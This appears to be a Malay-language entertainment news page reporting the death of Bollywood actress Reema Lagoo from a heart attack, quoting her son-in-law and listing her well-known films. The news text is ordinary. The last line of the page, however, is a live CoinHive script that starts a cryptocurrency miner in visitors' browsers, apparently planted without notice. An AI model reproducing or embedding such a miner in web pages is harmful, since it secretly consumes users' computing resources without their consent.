© Copyright 2017, All Rights Reserved
Home / Hiburan / Pelakon Kuch Kuch Hota Hai Reema Lagoo meninggal dunia

Pelakon Kuch Kuch Hota Hai Reema Lagoo meninggal dunia


PELAKON Bollywood yang terkenal dengan watak ibu, Reema Lagoo, 59, dilaporkan meninggal dunia akibat serangan jantung.
 
Perkara itu disahkan oleh menantunya, Vinay Waikul.
 
Menurut Vinay, Reema menghembuskan nafas terakhir sekitar jam 3.15 pagi Khamis di Hospital Kokilaben Dhirubhai Ambani, Mumbai selepas mengalami serangan jantung.
 
“Pada mulanya dia kelihatan baik sahaja cuma memberitahu mengalami sakit dada sekitar jam 1.00 petang Rabu.
 
“Kami kemudiannya bergegas membawanya ke hospital, dan kemudiannya disahkan meninggal dunia pada jam 3.15 pagi selepas mengalami serangan jantung.
 
“Berita ini sememangnya mengejutkan kami sekeluarga kerana sebelum ini dia tidak mengalami sebarang masalah kesihatan” jelasnya.
 
Majlis pengebumian mendiang yang berlangsung pada Khamis telah dihadiri oleh pelakon popular Bollywood antaranya Rishi Kapoor, Aamir Khan dan Kajol.
 
Terdahulu, Reema merupakan aktres popular sebagai watak ibu penyayang yang telah membintangi berpuluh-puluh filem terkenal Bollywood seperti Kuch Kuch Hota Hai, Hum Aapke Hain Koun, Kal Ho Na Ho dan Maine Pyar Kiya.
 
Sumber: Hindustan Times / IE Entertainment


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Sebak hati AG ziarah kubur

PENYAMPAI radio Kool FM, AG turut meluangkan masa menziarah kubur 11 pelajar ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();